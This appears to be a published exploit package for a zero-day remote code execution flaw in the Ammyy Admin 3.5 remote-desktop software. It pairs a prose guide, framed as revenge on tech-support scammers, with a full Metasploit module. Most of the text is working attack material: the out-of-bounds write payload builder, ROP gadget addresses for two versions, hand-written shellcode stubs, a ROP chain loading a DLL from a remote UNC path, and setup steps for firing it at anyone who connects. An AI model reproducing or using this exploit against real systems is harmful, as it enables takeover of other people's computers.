Ammyy Admin 3.5 - Remote Code Execution (Metasploit)









Mirror: (

The Revenge of the Scammers

This exploit is an 0day in Ammyy Admin ( a remote desktop type software that is well known for being the software that many fake tech support phone scammers used on their victims. It claims to be used by tens of millions of people. The 0-day works from the "controlled" end; when someone tries to connect to you, asking to control your computer, you send back the exploit and take over the controller. It has been written for and tested against the latest version of Ammyy Admin. (now 3.5)

This package includes two main parts: a fully commented Metasploit module, and the “aaexploit.exe” launcher. The MSF module generates a file “exploit.dat” that you will copy along with aaexploit.exe to a computer or VM to launch the exploit from. The exploit is actually launched from a DLL injected into a copy of AA, which hooks AA's data send functions, replacing them with the exploit data. This is done to avoid re-implementing AA's complex outer encryption wrapper, and allow for multiple connection types (although only one has been tested). Aaexploit.exe automates the extraction of the AA executable and dll and injection of the DLL.

This exploit has tested against many configurations, (Windows Vista and 7 32 and 64 bit) but so far it has been tested only on isolated networks. One of the ways AA can connect is via a relay in the cloud run by Ammyy. Via reverse-engineering and debugging, it is clear the same functions are reached through both methods (relay or direct), but for OPSEC reasons, I have not sent the exploit through the relays in the cloud. You can also avoid that by running your exploit from a VM directly connected to the internet, and blocking the relay:

0. Open a windows VM you'll launch the exploit from.
1. Add the line "" to C:\Windows\system32\drivers\etc\hosts
2. Set your VM to "bridged" and disable the firewall.
3. Forward TCP port 5931 from your router to your VM IP address.
4. When the bad guys ask for your Ammyy ID, tell them your EXTERNAL IP address.

This only allows direct connection rather than going through the Ammyy relay servers. Connections are encrypted, so you may not be concerned, but the choice is up to you.

If want to generate your own payload, drop the .rb file in your modules/exploits/windows/fileformat/ directory, start up metasploit, "use exploit/windows/fileformat/ammyy_admin_oob" and use the 3.5 direct target. Remember you have to start up a handler separately. The Always-On DEP-bypassing targets rely on loading a DLL from a UNC path, which can take a long time, depends on more things, and requires you to set up webdav and/or an SMB server somewhere manually. Also, nobody but the most paranoid security guys set the obscure Always-On DEP setting, so you really don't have to worry about it. The 3.4 targets are still in there because they were the latest until a few weeks ago, but your best bet is to stick with the latest 3.5.

Testing Instructions
1. Download Ammyy from the Ammyy website.
2. Set up two Windows VM's in an isolated network.
3. Use the Metasploit module to generate your exploit.dat file.
4. Copy the exploit.dat file and aaexploit.exe to the first VM (good guy VM) and run aaexploit.exe. After a few seconds, you will get a popup saying Ammyy isn't connected to the internet. Click to ignore it. Wait for 15 seconds to complete loading the exploit.
5. Start the Ammyy executable on the second VM (bad guy VM). After a few seconds, you will get a popup saying Ammyy isn't connected to the internet. Click to ignore it.
6. From the bad guy VM, type in the IP of the good guy VM in the “Client ID/IP” field and click Connect.
7. You will get a popup on the good guy VM asking if you want to allow the connection. Hit “allow” to send the exploit.
8. The bad guy VM should display a blank “Loading” window that  will sit there as long as your shellcode is running. In this exploit, I deliberately did NOT return execution flow to the  original thread, since I assumed you would not want to provide the bad guy with control over your VM.

# This module requires Metasploit: http//
# Current source:

require 'msf/core'
require 'rexml/document'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
      'Name'           => 'Ammyy Admin Array Index Out-Of-Bounds',
      'Description'    => %q{
        This exploit gains code execution on the controller side of Ammyy Admin from the controlled
        side. To do this, it exploits an array index out-of-bounds write. The exploit uses the
        relative OOB write to overwrite a return address on the thread stack, which is generally
        mapped directly below the Ammyy image data, and retrying on the next thread stack in case
        that was not the correct thread.

        There are two targets, one for immediate, direct shellcode execution taking advantage of
        the fact that Ammyy does not opt-in to DEP, and the second, using a ROP-only exploit to
        call LoadLibraryW with a remote UNC path.

        Since Ammyy Admin uses a crypto library that would be very time-consuming to reproduce and
        multiple methods of setting up a connection (relay, direct, etc.) this exploit was written
        to simply hook Ammyy Admin from an injected DLL, using its own code to handle the crypto and 
        connections, substituting the exploit for any data sent to the server. This module will 
        generate a file (exploit.dat) you must copy, along with aaexploit.exe, to a Windows VM. Run 
        aaexploit.exe, and wait for a connection. When you hit "accept" on the connection, the 
        exploit will be sent.

        This module has been tested successfully against Ammyy Admin 3.4 on Windows Vista 32-bit
        and Windows 7 32 and 64-bit for direct (IP) connections only.
      'License'        => MSF_LICENSE,
      'Author'         =>
          'Matt "scriptjunkie" Weeks <scriptjunkie[at]>'
      'References'     =>
          [ 'CVE', '2014-XXXX' ],
          [ 'OSVDB', 'XXXX' ],
      'Payload'        =>
          'Space'          => 800,
          'DisableNops'    => true
      'Platform'       => 'win',
      'Targets'        =>
          [ 'Ammyy Admin 3.4 Direct',
              'Type'    => 'direct',
              'Version' => '3.4'
          [ 'Ammyy Admin 3.4 Always-On DEP',
              'Type'    => 'rop',
              'Version' => '3.4'
          [ 'Ammyy Admin 3.5 Direct',
              'Type'    => 'direct',
              'Version' => '3.5'
          [ 'Ammyy Admin 3.5 Always-On DEP',
              'Type'    => 'rop',
              'Version' => '3.5'
      'Privileged'     => true,
      'DisclosureDate' => '',
      'DefaultTarget'  => 0))

      ['DLL_PATH', [ false, 'The DLL path to load for the DEP Always-On target.',
            '\\\\\\file.dll']),'FILENAME', [ true, 'The file name.',  'exploit.dat']),
      ], self.class)

  # Takes a string of binary data, and generates a stroke set in the Ammyy protocol which will
  # write that data to the specified col/row point on the remote side, skipping a given pixel if
  # specified to avoid overwriting a particular local variable at the wrong time
  def strokeSet(col, row, data, skip)
    #minus one because the number of strokes is the number of pixels - 1
    numpixels = (data.length + 3) / 4
    numpixels -= 1 if skip != -1 # subtract again if you have a skip

    #03 XoffsetWord YoffsetWord DrawWidthWord DrawHeightWord
    output = "\x03" + [col, row, numpixels, 1].pack('vvvv')
    output << "XXXX" # end of packet signal to injector

    offset = -1
    #zero pad to 4 byte boundary; any extra is discarded in unpack("V*")
    (data + "\x00\x00\x00").unpack('V*').each do |pixel|
        offset += 1
        next if skip == offset # don't write this pixel if we're avoiding overwriting a var

        # Get pixel values from this 4-byte chunk
        r, g, b, a = [pixel].pack("V").unpack("C*")

        # sanity check pixel value
        print_error("Shellcode at pixel #{offset} invalid; has trailing 0") if a != 0

        # We send pixels in 16 x 1 sections; each of which has its own header (0x1A)
        if offset % 0x10 == 0
            # Chunk header; includes flags (0x1A), background color we use to set 1st pixel values,
            # and number of strokes (pixels) remaining to send in this chunk
            numstrokes = [0xF, numpixels - offset - 1].min
            output << [0x1A, r, g, b, numstrokes].pack("C*")
            # This is a stroke. A stroke can be multiple pixels wide or high, but we're just using
            # them to write a single pixel each. Data format looks like this:

            # R G B [low nibble Y offset, high nibble X offset]
            # [low nibble stroke height; high nibble stroke width]

            # since we're only using 1x1 strokes, we only set the X offset part of this
            output << [r, g, b, (offset % 0x10) << 4, 0].pack("C*")
    output << "XXXX"

  def exploit
    # Injected dll divides packets to send by "XXXX"
    # First we specify header data and global flags for the connection.
    sploit = "XXXX=XXXX"
    sploit << "\x7E\xCC\xF5\xED\xB7\x16\x92\xE2\x96\xBD\xF3\xFF\xC0\xFF\x2D\x97\x69\xF2\xCA\x99"
    sploit << "XXXX"
    sploit << "\x00\x7F\x00\x00\x00"
    sploit << "XXXX"
    # send bogus system info
    sploit << "\x3A\x00Windows\x006.0.6001 SP1.0\x00U_R_PWNED\x0AJan 01 2014 at 01:23:45\x00\x05"
    sploit << "XXXX"
    sploit << "\x15"
    sploit << "XXXX"
    # screen dimensions and stuff
    sploit << "\x70\x03\x03\x65\x18\x00\xff\x00\xff\x00\xff\x00\x10\x08\x00\x20\x00\xff\x00\xff\x00"
    sploit << "\xff\x00\x10\x08\x00\x20\x03\x58\x02"
    sploit << "XXXX"

	if target['Version'] == '3.4'
		offsets = {
			'push_esp_ret' => 0x004424a2,
			'pop_ebp_ret'  => 0x004488bf,
			'loadlibW'     => 0x0044C7B3,
			'pop_edi_ret'  => 0x0045aba9,
			'pop_esi_ret'  => 0x00460029,
			'pushad_ret'   => 0x0045ed48,
			'ret'          => 0x00430315
		offsets = {
			'push_esp_ret' => 0x004786cf,
			'pop_ebp_ret'  => 0x00418086,
			'loadlibW'     => 0x0044F079,
			'pop_edi_ret'  => 0x00471639,
			'pop_esi_ret'  => 0x0046003e,
			'pushad_ret'   => 0x004615e8,
			'ret'          => 0x004012C0
    if target['Type'] == 'direct'
        # shellcode must be in unicode format
        first_payload = payload.encoded
        encoder = framework.encoders.create("x86/unicode_mixed")
        encoder.datastore.import_options_from_hash( {'BufferRegister'=> 'ESP' })
        unicode_payload = encoder.encode(first_payload, nil, nil, platform)
        scode = unicode_payload.unpack("C*").pack("v*")
        # actually not, but every 4th byte must be a 0 since we can only write the R G B parts of
        # the pixel, and the pixels are stored as R G B A, which ends up being R G B 0, but we
        # don't have  a generic "every 4th byte must be null" encoder, so we just use the Unicode
        # one, which works just fine.

        # First stroke set will write the shellcode at the beginning of the screen buffer
        sploit << strokeSet(0, 599, scode, -1)

        # Second write will be an OOB write that will overwrite the return address
        # Then calculate address of shellcode and jump to the shellcode
        # This will work most of the time
        stack = [offsets['push_esp_ret'], # PUSH ESP # RETN  in AA_v3.exe
                 0x00000000].pack("V*")   # not used since ret 4; must be skipped due to local var
        stack << "\xB8\x3C\x01\x00\x00" + # mov eax, 0x13C
                 "\xEB\x01" +             # jmp next
                 "\x00" +                 # has to be null
                 "\x01\xC4" +             # next: add esp, eax
                 "\xEB\x00" +             # jmp over mandatory null
                 "\xFF\xE4"               # jmp esp

        # Return address is at 0325FEBC, when pixel data  starts at 03360000. That's a 0x144 or 324
        # byte OOB overwrite from start of image, which is 81 pixels. So, with an 800x600 screen,
        # we use a stroke set with X offset 719 and Y offset 600 (rows go down in address)
        sploit << strokeSet(719, 600, stack, 1)

        # Third write will be second trigger, and may work if that fails
        # it's pretty much the same thing except add another megabyte (default stack size) to esp
        stack = [offsets['push_esp_ret'],   # PUSH ESP # RETN  in AA_v3.exe
                 0x00000000].pack("V*")     # not used since ret 4; must be skipped due to local var
        stack << "\x81\xC4\x3C\x00\x01\x00" # add esp,0x1003c
                 "\xEB\x00"                 # jmp over mandatory null
                 "\xB8\x00\x01\x00\x00"     # mov eax,0x100
                 "\xEB\x01" +               # jmp next
                 "\x00" +                   # has to be null
                 "\x01\xC4" +               # next: add esp, eax
                 "\xEB\x00" +               # jmp over mandatory null
                 "\xFF\xE4"                 # jmp esp

        # executing stack is 0x100000 below since default stack size is 1MB (0x100000 bytes); e.g.
        # at 0347FEBC when image starts at 03580000. That's 0x40051 (or 262225) pixels back, which
        # is 327 rows and then 625 pixels. So our X offset is 175 (AF) and Y offset is 927
        sploit << strokeSet(175, 927, stack, 1)

    elsif target['Type'] == 'rop'
        # ROP target is all-in-one write that will overwrite the return address on the stack
        # and end up calling LoadLibraryW with a UNC path
        stack = [offsets['pop_ebp_ret'],    # POP EBP # RETN [AA_v3.exe]
                 0x00000000,                # not used since ret 4; must be skipped due to local var
				 offsets['loadlibW'],       # address of call LoadLibraryW
				 offsets['pop_edi_ret'],    # POP EDI # RETN [AA_v3.exe]
				 offsets['ret'],            # RETN
				 offsets['pop_esi_ret'],    # POP ESI # RETN
				 offsets['ret'],            # RETN
				 offsets['pushad_ret'],     # PUSHAD # RETN    jumps to edi, with esi, ebp, orig esp... above
        stack << datastore['DLL_PATH'].unpack("C*").pack("v*")

        # same offset logic as above
        sploit << strokeSet(719, 600, stack, 1)

        # second try, same logic as above
        sploit << strokeSet(175, 927, stack, 1)

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    print_status("Now copy that, along with aaexploit.exe, to a Windows VM.")
    print_status("Then run aaexploit.exe, and wait for a connection.")
    print_status("Hit accept on a connection request to send the exploit.")

